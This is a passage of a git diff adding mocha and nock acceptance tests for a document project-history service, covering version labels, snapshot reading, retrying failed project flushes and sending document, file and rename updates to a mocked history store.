+import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js'
+import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js'
+const { ObjectId } = mongodb
+
+const MockHistoryStore = () => nock('http://127.0.0.1:3100')
+const MockWeb = () => nock('http://127.0.0.1:3000')
+
+const fixture = path => new
URL(`../fixtures/${path}`, import.meta.url) + +describe('Labels', function () { + beforeEach(function (done) { + ProjectHistoryApp.ensureRunning(error => { + if (error != null) { + throw error + } + + this.historyId = new ObjectId().toString() + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + + ProjectHistoryClient.initializeProject( + this.historyId, + (error, olProject) => { + if (error != null) { + throw error + } + this.project_id = new ObjectId().toString() + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: olProject.id } }, + }) + + MockHistoryStore() + .get(`/api/projects/${this.historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/7/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + .persist() + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/8/history`) + .replyWithFile(200, fixture('chunks/7-8.json')) + .persist() + + this.comment = 'a saved version comment' + this.comment2 = 'another saved version comment' + this.user_id = new ObjectId().toString() + this.created_at = new Date(1) + done() + } + ) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + it('can create and get labels', function (done) { + ProjectHistoryClient.createLabel( + this.project_id, + this.user_id, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels(this.project_id, (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([label]) + done() + }) + } + ) + }) + + it('can create and get labels with no user id', function (done) { + const userId = undefined + ProjectHistoryClient.createLabel( + this.project_id, + userId, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels(this.project_id, (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([label]) + done() + }) + } + ) + }) + + it('can delete labels', function (done) { + ProjectHistoryClient.createLabel( + this.project_id, + this.user_id, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.deleteLabel(this.project_id, label.id, error => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels(this.project_id, (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([]) + done() + }) + }) + } + ) + }) + + it('can delete labels for the current user', function (done) { + ProjectHistoryClient.createLabel( + this.project_id, + this.user_id, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.deleteLabelForUser( + this.project_id, + this.user_id, + label.id, + error => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels(this.project_id, (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([]) + done() + }) + } + ) + } + ) + }) + + it('can transfer ownership of labels', function (done) { + const fromUser = new ObjectId().toString() + const toUser = new ObjectId().toString() + ProjectHistoryClient.createLabel( + this.project_id, + fromUser, + 7, + this.comment, + this.created_at, + (error, label) => { + if (error != 
null) { + throw error + } + ProjectHistoryClient.createLabel( + this.project_id, + fromUser, + 7, + this.comment2, + this.created_at, + (error, label2) => { + if (error != null) { + throw error + } + ProjectHistoryClient.transferLabelOwnership( + fromUser, + toUser, + error => { + if (error != null) { + throw error + } + ProjectHistoryClient.getLabels( + this.project_id, + (error, labels) => { + if (error != null) { + throw error + } + expect(labels).to.deep.equal([ + { + id: label.id, + comment: label.comment, + version: label.version, + created_at: label.created_at, + user_id: toUser, + }, + { + id: label2.id, + comment: label2.comment, + version: label2.version, + created_at: label2.created_at, + user_id: toUser, + }, + ]) + done() + } + ) + } + ) + } + ) + } + ) + }) + + it('should return labels with summarized updates', function (done) { + ProjectHistoryClient.createLabel( + this.project_id, + this.user_id, + 8, + this.comment, + this.created_at, + (error, label) => { + if (error != null) { + throw error + } + ProjectHistoryClient.getSummarizedUpdates( + this.project_id, + { min_count: 1 }, + (error, updates) => { + if (error != null) { + throw error + } + expect(updates).to.deep.equal({ + nextBeforeTimestamp: 6, + updates: [ + { + fromV: 6, + toV: 8, + meta: { + users: ['5a5637efdac84e81b71014c4', 31], + start_ts: 1512383567277, + end_ts: 1512383572877, + }, + pathnames: ['bar.tex', 'main.tex'], + project_ops: [], + labels: [ + { + id: label.id.toString(), + comment: this.comment, + version: 8, + user_id: this.user_id, + created_at: this.created_at.toISOString(), + }, + ], + }, + ], + }) + done() + } + ) + } + ) + }) +}) diff --git a/services/project-history/test/acceptance/js/LatestSnapshotTests.js b/services/project-history/test/acceptance/js/LatestSnapshotTests.js new file mode 100644 index 0000000..6e989ff --- /dev/null +++ b/services/project-history/test/acceptance/js/LatestSnapshotTests.js @@ -0,0 +1,78 @@ +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('LatestSnapshot', function () { + beforeEach(function (done) { + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + + this.historyId = new ObjectId().toString() + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + + ProjectHistoryClient.initializeProject( + this.historyId, + (error, v1Project) => { + if (error) { + throw error + } + this.projectId = new ObjectId().toString() + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: v1Project.id } }, + }) + done() + } + ) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + it('should return the snapshot with applied changes, metadata and without full content', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/latest/history`) + .replyWithFile(200, fixture('chunks/0-3.json')) + + ProjectHistoryClient.getLatestSnapshot(this.projectId, (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal({ + snapshot: { + files: { + 'main.tex': { + hash: 
'f28571f561d198b87c24cc6a98b78e87b665e22d', + stringLength: 20649, + operations: [{ textOperation: [1912, 'Hello world', 18726] }], + metadata: { main: true }, + }, + 'foo.tex': { + hash: '4f785a4c192155b240e3042b3a7388b47603f423', + stringLength: 41, + operations: [{ textOperation: [26, '\n\nFour five six'] }], + }, + }, + }, + version: 3, + }) + done() + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/ReadingASnapshotTests.js b/services/project-history/test/acceptance/js/ReadingASnapshotTests.js new file mode 100644 index 0000000..af373bf --- /dev/null +++ b/services/project-history/test/acceptance/js/ReadingASnapshotTests.js @@ -0,0 +1,298 @@ +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const fixture = path => new URL(`../fixtures/${path}`, import.meta.url) + +describe('ReadSnapshot', function () { + beforeEach(function (done) { + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + + this.historyId = new ObjectId().toString() + MockHistoryStore().post('/api/projects').reply(200, { + projectId: this.historyId, + }) + + ProjectHistoryClient.initializeProject( + this.historyId, + (error, v1Project) => { + if (error) { + throw error + } + this.projectId = new ObjectId().toString() + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { history: { id: v1Project.id } }, + }) + done() + } + ) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('of a text file', function () { + it('should return the snapshot of a doc at the given version', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/5/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithFile( + 200, + fixture('blobs/c6654ea913979e13e22022653d284444f284a172') + ) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'foo.tex', + 5, + (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal( + `\ +Hello world + +One two three + +Four five six + +Seven eight nine\ +`.replace(/^\t/g, '') + ) + done() + } + ) + }) + + it('should return the snapshot of a doc at a different version', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithFile( + 200, + fixture('blobs/c6654ea913979e13e22022653d284444f284a172') + ) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'foo.tex', + 4, + (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal( + `\ +Hello world + +One two three + +Four five six + +Seven eight nince\ +`.replace(/^\t/g, '') + ) + done() + } + ) + }) + + it('should return the snapshot of a doc after a rename version', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/6/history`) + .replyWithFile(200, fixture('chunks/4-6.json')) + MockHistoryStore() + .get( + 
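+          // the rename only changed the pathname: the snapshot still points
+          // at the same content blob, so the same fixture hash is served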
`/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithFile( + 200, + fixture('blobs/c6654ea913979e13e22022653d284444f284a172') + ) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'bar.tex', + 6, + (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal( + `\ +Hello world + +One two three + +Four five six + +Seven eight nine\ +`.replace(/^\t/g, '') + ) + done() + } + ) + }) + }) + + describe('of a binary file', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + binary_file: { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 3, + }, + authors: [], + }) + }) + + it('should return the snapshot of the file at the given version', function (done) { + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithFile( + 200, + fixture('blobs/c6654ea913979e13e22022653d284444f284a172') + ) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'binary_file', + 4, + (error, body) => { + if (error) { + throw error + } + expect(body).to.deep.equal( + `\ +Hello world + +One two three + +Four five six\ +`.replace(/^\t/g, '') + ) + done() + } + ) + }) + + it("should return an error when the blob doesn't exist", function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + binary_file: { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 3, + }, + authors: [], + }) + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .reply(404) + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'binary_file', + 4, + { allowErrors: true }, + (error, body, statusCode) => { + if (error) { + throw error + } + expect(statusCode).to.equal(500) + done() + } + ) + }) + + it('should return an error when the blob request errors', function (done) { + MockHistoryStore() + .get(`/api/projects/${this.historyId}/versions/4/history`) + .reply(200, { + chunk: { + history: { + snapshot: { + files: { + binary_file: { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 3, + }, + authors: [], + }) + MockHistoryStore() + .get( + `/api/projects/${this.historyId}/blobs/c6654ea913979e13e22022653d284444f284a172` + ) + .replyWithError('oh no!') + + ProjectHistoryClient.getSnapshot( + this.projectId, + 'binary_file', + 4, + { allowErrors: true }, + (error, body, statusCode) => { + if (error) { + throw error + } + expect(statusCode).to.equal(500) + done() + } + ) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/RetryTests.js b/services/project-history/test/acceptance/js/RetryTests.js new file mode 100644 index 0000000..1fa356e --- /dev/null +++ b/services/project-history/test/acceptance/js/RetryTests.js @@ -0,0 +1,194 @@ +import async from 'async' +import nock from 'nock' +import { expect } from 'chai' +import request from 'request' +import assert from 'node:assert' +import mongodb from 'mongodb-legacy' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = 
mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockWeb = () => nock('http://127.0.0.1:3000') + +const MockCallback = () => nock('http://127.0.0.1') + +describe('Retrying failed projects', function () { + const historyId = new ObjectId().toString() + + beforeEach(function (done) { + this.timestamp = new Date() + + ProjectHistoryApp.ensureRunning(error => { + if (error) { + throw error + } + this.project_id = new ObjectId().toString() + this.doc_id = new ObjectId().toString() + this.file_id = new ObjectId().toString() + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + changes: [], + }, + }, + }) + ProjectHistoryClient.initializeProject(historyId, done) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('retrying project history', function () { + describe('when there is a soft failure', function () { + beforeEach(function (done) { + this.flushCall = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/0a207c060e61f3b88eaee0a8cd0696f46fb155eb` + ) + .reply(201) + .post(`/api/projects/${historyId}/legacy_changes?end_version=0`) + .reply(200) + const update = { + pathname: '/main.tex', + docLines: 'a\nb', + doc: this.doc_id, + meta: { user_id: this.user_id, ts: new Date() }, + } + async.series( + [ + cb => + ProjectHistoryClient.pushRawUpdate(this.project_id, update, cb), + cb => + ProjectHistoryClient.setFailure( + { + project_id: this.project_id, + attempts: 1, + error: 'soft-error', + }, + cb + ), + ], + done + ) + }) + + it('flushes the project history queue', function (done) { + request.post( + { + url: 'http://127.0.0.1:3054/retry/failures?failureType=soft&limit=1&timeout=10000', + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates' + ) + done() + } + ) + }) + + it('retries in the background when requested', function (done) { + this.callback = MockCallback() + .matchHeader('Authorization', '123') + .get('/ping') + .reply(200) + request.post( + { + url: 'http://127.0.0.1:3054/retry/failures?failureType=soft&limit=1&timeout=10000&callbackUrl=http%3A%2F%2F127.0.0.1%2Fping', + headers: { + 'X-CALLBACK-Authorization': '123', + }, + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + expect(body).to.equal( + '{"retryStatus":"running retryFailures in background"}' + ) + assert( + !this.flushCall.isDone(), + 'did not make calls to history service to store updates in the foreground' + ) + setTimeout(() => { + assert( + this.flushCall.isDone(), + 'made calls to history service to store updates in the background' + ) + assert(this.callback.isDone(), 'hit the callback url') + done() + }, 100) + } + ) + }) + }) + + describe('when there is a hard failure', function () { + beforeEach(function (done) { + MockWeb() + .get(`/project/${this.project_id}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + ProjectHistoryClient.setFailure( + { + project_id: this.project_id, + attempts: 100, + error: 'hard-error', + }, + done + ) + }) + + it('calls web to resync the 
project', function (done) { + const resyncCall = MockWeb() + .post(`/project/${this.project_id}/history/resync`) + .reply(200) + + request.post( + { + url: 'http://127.0.0.1:3054/retry/failures?failureType=hard&limit=1&timeout=10000', + }, + (error, res, body) => { + if (error) { + return done(error) + } + expect(res.statusCode).to.equal(200) + assert(resyncCall.isDone(), 'made a call to web to resync project') + done() + } + ) + }) + }) + }) +}) diff --git a/services/project-history/test/acceptance/js/SendingUpdatesTests.js b/services/project-history/test/acceptance/js/SendingUpdatesTests.js new file mode 100644 index 0000000..dce5474 --- /dev/null +++ b/services/project-history/test/acceptance/js/SendingUpdatesTests.js @@ -0,0 +1,2197 @@ +import { expect } from 'chai' +import Settings from '@overleaf/settings' +import assert from 'node:assert' +import async from 'async' +import crypto from 'node:crypto' +import mongodb from 'mongodb-legacy' +import nock from 'nock' +import * as ProjectHistoryClient from './helpers/ProjectHistoryClient.js' +import * as ProjectHistoryApp from './helpers/ProjectHistoryApp.js' +const { ObjectId } = mongodb + +const MockHistoryStore = () => nock('http://127.0.0.1:3100') +const MockFileStore = () => nock('http://127.0.0.1:3009') +const MockWeb = () => nock('http://127.0.0.1:3000') + +// Some helper methods to make the tests more compact +function slTextUpdate(historyId, doc, userId, v, ts, op) { + return { + projectHistoryId: historyId, + doc: doc.id, + op, + v, + + meta: { + user_id: userId, + ts: ts.getTime(), + pathname: doc.pathname, + doc_length: doc.length, + }, + } +} + +function slAddDocUpdate(historyId, doc, userId, ts, docLines, ranges = {}) { + return { + projectHistoryId: historyId, + pathname: doc.pathname, + ranges, + docLines, + doc: doc.id, + meta: { user_id: userId, ts: ts.getTime() }, + } +} + +function slAddDocUpdateWithVersion( + historyId, + doc, + userId, + ts, + docLines, + projectVersion, + ranges = {} +) { + const result = slAddDocUpdate(historyId, doc, userId, ts, docLines, ranges) + result.version = projectVersion + return result +} + +function slAddFileUpdate(historyId, file, userId, ts, projectId) { + return { + projectHistoryId: historyId, + pathname: file.pathname, + url: `http://127.0.0.1:3009/project/${projectId}/file/${file.id}`, + file: file.id, + ranges: undefined, + meta: { user_id: userId, ts: ts.getTime() }, + } +} + +function createdBlobFileUpdate(historyId, file, userId, ts, projectId) { + return { + projectHistoryId: historyId, + pathname: file.pathname, + createdBlob: true, + url: null, + file: file.id, + hash: file.hash, + ranges: undefined, + meta: { user_id: userId, ts: ts.getTime() }, + } +} + +function slRenameUpdate(historyId, doc, userId, ts, pathname, newPathname) { + return { + projectHistoryId: historyId, + pathname, + new_pathname: newPathname, + doc: doc.id, + meta: { user_id: userId, ts: ts.getTime() }, + } +} + +function olUpdate(doc, userId, ts, operations, v) { + return { + v2Authors: [userId], + timestamp: ts.toJSON(), + authors: [], + operations, + v2DocVersions: { + [doc.id]: { + pathname: doc.pathname.replace(/^\//, ''), // Strip leading / + v: v || 1, + }, + }, + } +} + +function olTextOperation(doc, textOperation) { + return { + pathname: doc.pathname.replace(/^\//, ''), // Strip leading / + textOperation, + } +} + +function olAddCommentOperation(doc, commentId, pos, length) { + return { + pathname: doc.pathname.replace(/^\//, ''), // Strip leading / + commentId, + ranges: [{ pos, length }], + } 
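+  // note: the sl* helpers build raw updates in the shape that doc-updater
+  // pushes onto the queue, while the ol* helpers build the change bodies
+  // the history store is expected to receive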
+} + +function olTextUpdate(doc, userId, ts, textOperation, v) { + return olUpdate(doc, userId, ts, [olTextOperation(doc, textOperation)], v) +} + +function olTextUpdates(doc, userId, ts, textOperations, v) { + return olUpdate( + doc, + userId, + ts, + textOperations.map(textOperation => olTextOperation(doc, textOperation)), + v + ) +} + +function olRenameUpdate(doc, userId, ts, pathname, newPathname) { + return { + v2Authors: [userId], + timestamp: ts.toJSON(), + authors: [], + + operations: [ + { + pathname, + newPathname, + }, + ], + } +} + +function olAddDocUpdate(doc, userId, ts, fileHash, rangesHash = undefined) { + const update = { + v2Authors: [userId], + timestamp: ts.toJSON(), + authors: [], + + operations: [ + { + pathname: doc.pathname.replace(/^\//, ''), // Strip leading / + file: { + hash: fileHash, + }, + }, + ], + } + if (rangesHash) { + update.operations[0].file.rangesHash = rangesHash + } + return update +} + +function olAddDocUpdateWithVersion( + doc, + userId, + ts, + fileHash, + version, + rangesHash = undefined +) { + const result = olAddDocUpdate(doc, userId, ts, fileHash, rangesHash) + result.projectVersion = version + return result +} + +function olAddFileUpdate(file, userId, ts, fileHash) { + return { + v2Authors: [userId], + timestamp: ts.toJSON(), + authors: [], + + operations: [ + { + pathname: file.pathname.replace(/^\//, ''), // Strip leading / + file: { + hash: fileHash, + }, + }, + ], + } +} + +describe('Sending Updates', function () { + const historyId = new ObjectId().toString() + + beforeEach(function (done) { + this.timestamp = new Date() + + ProjectHistoryApp.ensureRunning(error => { + if (error) { + return done(error) + } + this.userId = new ObjectId().toString() + this.projectId = new ObjectId().toString() + this.docId = new ObjectId().toString() + + this.doc = { + id: this.docId, + pathname: '/main.tex', + length: 5, + } + + MockHistoryStore().post('/api/projects').reply(200, { + projectId: historyId, + }) + MockWeb() + .get(`/project/${this.projectId}/details`) + .reply(200, { + name: 'Test Project', + overleaf: { + history: { + id: historyId, + }, + }, + }) + ProjectHistoryClient.initializeProject(historyId, done) + }) + }) + + afterEach(function () { + nock.cleanAll() + }) + + describe('basic update types', function () { + beforeEach(function () { + MockHistoryStore() + .get(`/api/projects/${historyId}/latest/history`) + .reply(200, { + chunk: { + startVersion: 0, + history: { + snapshot: {}, + changes: [], + }, + }, + }) + }) + + it('should send add doc updates to the history store', function (done) { + const fileHash = '0a207c060e61f3b88eaee0a8cd0696f46fb155eb' + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, 'a\nb') + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate(this.doc, this.userId, this.timestamp, fileHash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + this.doc, + this.userId, + this.timestamp, + 'a\nb' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been 
called` + ) + done() + } + ) + }) + + it('should send ranges to the history store', function (done) { + const fileHash = '49e886093b3eacbc12b99a1eb5aeaa44a6b9d90e' + const rangesHash = 'fa9a429ff518bc9e5b2507a96ff0646b566eca65' + + const historyRanges = { + trackedChanges: [ + { + range: { pos: 4, length: 3 }, + tracking: { + type: 'delete', + userId: 'user-id-1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ], + comments: [ + { + ranges: [{ pos: 0, length: 3 }], + id: 'comment-id-1', + }, + ], + } + + // We need to set up the ranges mock first, as we will call it last.. + const createRangesBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${rangesHash}`, historyRanges) + .reply(201) + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${fileHash}`, 'foo barbaz') + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate( + this.doc, + this.userId, + this.timestamp, + fileHash, + rangesHash + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + this.doc, + this.userId, + this.timestamp, + 'foo barbaz', + { + changes: [ + { + op: { p: 4, d: 'bar' }, + metadata: { + ts: 1704067200000, + user_id: 'user-id-1', + }, + }, + ], + comments: [ + { + op: { + p: 0, + c: 'foo', + t: 'comment-id-1', + }, + metadata: { resolved: false }, + }, + ], + } + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called to create content blob' + ) + assert( + createRangesBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called to create ranges blob' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should strip non-BMP characters in add doc updates before sending to the history store', function (done) { + const fileHash = '11509fe05a41f9cdc51ea081342b5a4fc7c8d0fc' + + const createBlob = MockHistoryStore() + .put( + `/api/projects/${historyId}/blobs/${fileHash}`, + 'a\nb\uFFFD\uFFFDc' + ) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddDocUpdate(this.doc, this.userId, this.timestamp, fileHash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slAddDocUpdate( + historyId, + this.doc, + this.userId, + this.timestamp, + 'a\nb\uD800\uDC00c' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createBlob.isDone(), + '/api/projects/:historyId/blobs/:hash should have been called' + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should send text updates to the history store', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olTextUpdate(this.doc, this.userId, this.timestamp, [3, '\nc', 2]), + ]) + return true + }) + .query({ end_version: 0 }) + 
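+        // nock matches the query string separately from the path; end_version
+        // is the version the project history is at before the queued changes
+        // are appended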
.reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slTextUpdate( + historyId, + this.doc, + this.userId, + 1, + this.timestamp, + [{ p: 3, i: '\nc' }] + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should send renames to the history store', function (done) { + const createChange = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olRenameUpdate( + this.doc, + this.userId, + this.timestamp, + 'main.tex', + 'main2.tex' + ), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + slRenameUpdate( + historyId, + this.doc, + this.userId, + this.timestamp, + '/main.tex', + '/main2.tex' + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + createChange.isDone(), + `/api/projects/${historyId}/changes should have been called` + ) + done() + } + ) + }) + + it('should not get file from filestore if no url provided', function (done) { + const file = { + id: new ObjectId().toString(), + pathname: '/test.png', + contents: Buffer.from([1, 2, 3]), + hash: 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74', + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .reply(200, file.contents) + + const checkBlob = MockHistoryStore() + .head(`/api/projects/${historyId}/blobs/${file.hash}`) + .reply(200) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(file, this.userId, this.timestamp, file.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( + this.projectId, + createdBlobFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + !fileStoreRequest.isDone(), + 'filestore should not have been called' + ) + + assert( + checkBlob.isDone(), + `HEAD /api/projects/${historyId}/blobs/${file.hash} should have been called` + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + done() + } + ) + }) + + it('should send add file updates to the history store', function (done) { + const file = { + id: new ObjectId().toString(), + pathname: '/test.png', + contents: Buffer.from([1, 2, 3]), + hash: 'aed2973e4b8a7ff1b30ff5c4751e5a2b38989e74', + } + + const fileStoreRequest = MockFileStore() + .get(`/project/${this.projectId}/file/${file.id}`) + .reply(200, file.contents) + + const createBlob = MockHistoryStore() + .put(`/api/projects/${historyId}/blobs/${file.hash}`, file.contents) + .reply(201) + + const addFile = MockHistoryStore() + .post(`/api/projects/${historyId}/legacy_changes`, body => { + expect(body).to.deep.equal([ + olAddFileUpdate(file, this.userId, this.timestamp, file.hash), + ]) + return true + }) + .query({ end_version: 0 }) + .reply(204) + + async.series( + [ + cb => { + ProjectHistoryClient.pushRawUpdate( 
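+              // queue the update as doc-updater would; the filestore and
+              // history store mocks are only hit once flushProject drains
+              // the queue below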
+ this.projectId, + slAddFileUpdate( + historyId, + file, + this.userId, + this.timestamp, + this.projectId + ), + cb + ) + }, + cb => { + ProjectHistoryClient.flushProject(this.projectId, cb) + }, + ], + error => { + if (error) { + return done(error) + } + assert( + fileStoreRequest.isDone(), + `/project/${this.projectId}/file/${file.id} should have been called` + ) + assert( + createBlob.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + assert( + addFile.isDone(), + `/api/projects/${historyId}/latest/files should have been called` + ) + done() + } + ) + }) + + it('should send a stub to the history store when the file is large', function (done) { + const fileContents = Buffer.alloc(Settings.maxFileSizeInBytes + 1, 'X') + const fileSize = Buffer.byteLength(fileContents) + + const fileHash = crypto + .createHash('sha1') + .update('blob ' + fileSize + '\x00') + .update(fileContents, 'utf8') + .digest('hex') + + const file = { + id: new ObjectId().toString(), + pathname: '/large.png', + contents: fileContents, + hash: fileHash, + } + + const stubContents = [ + 'FileTooLargeError v1', + 'File too large to be stored in history service', + `id project-${this.projectId}-file-${file.id}`, + `size ${fileSize} bytes`, + `hash ${fileHash}`, + 